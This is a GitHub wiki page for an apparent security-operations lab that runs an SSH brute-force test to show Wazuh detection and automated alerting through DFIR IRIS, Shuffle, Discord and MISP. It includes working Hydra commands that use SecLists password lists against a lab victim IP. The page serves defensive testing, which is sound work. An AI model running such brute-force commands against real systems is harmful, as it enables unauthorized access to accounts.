Brute‐force Proof Of Concept - socarium/makarasoc GitHub Wiki

Brute-force is a common attack vector that attackers use to gain unauthorized access to endpoints and services. Services like SSH on Linux endpoints is usually prone to brute-force attacks. Wazuh identifies brute-force attacks by correlating multiple authentication failure events.

Perform the following steps to configure the Ubuntu endpoint. This allows performing authentication failure attempts on the monitored victim endpoint.

• On the attacker endpoint, install Hydra and use it to execute the brute-force attack:

sudo apt update

sudo apt install hydra -y

• Clone repository SecLists belong to Daniel Miessler, the process of downloading depend on internet connection.

git clone https://github.com/danielmiessler/SecLists.git

Run Hydra from the attacker endpoint to execute brute-force attacks against the victim endpoint. To do this, replace <victim_ip> with the IP address of the victim endpoint and run the command below:

sudo hydra -l <username> -P <pass-list.txt> <victim_ip> ssh

Here is an example command from the attacker to victim (username: soc and IP: 192.168.1.12).

sudo hydra -l soc -P SecLists/Passwords/days.txt 192.168.1.12 ssh

Here is the evidence that the victim is already has the Wazuh agent.

You can visualize the alerts data in the Wazuh dashboard. To do this, go to the Threat Hunting module and event.

Evidence alerts from Wazuh to DFIR IRIS.

DFIR IRIS automatically create a case when specific wazuh rule id got hit.

The SOAR workflow proces.

Evidence the cases that automatically create based on automation shuffle.

Evidence from discord as notification alert that match with the SOAR workflow.

As in MISP intel if the IOC not match with the MISP Feeds, the response is null.

Here is a notification example if the IOC match with MISP Feeds.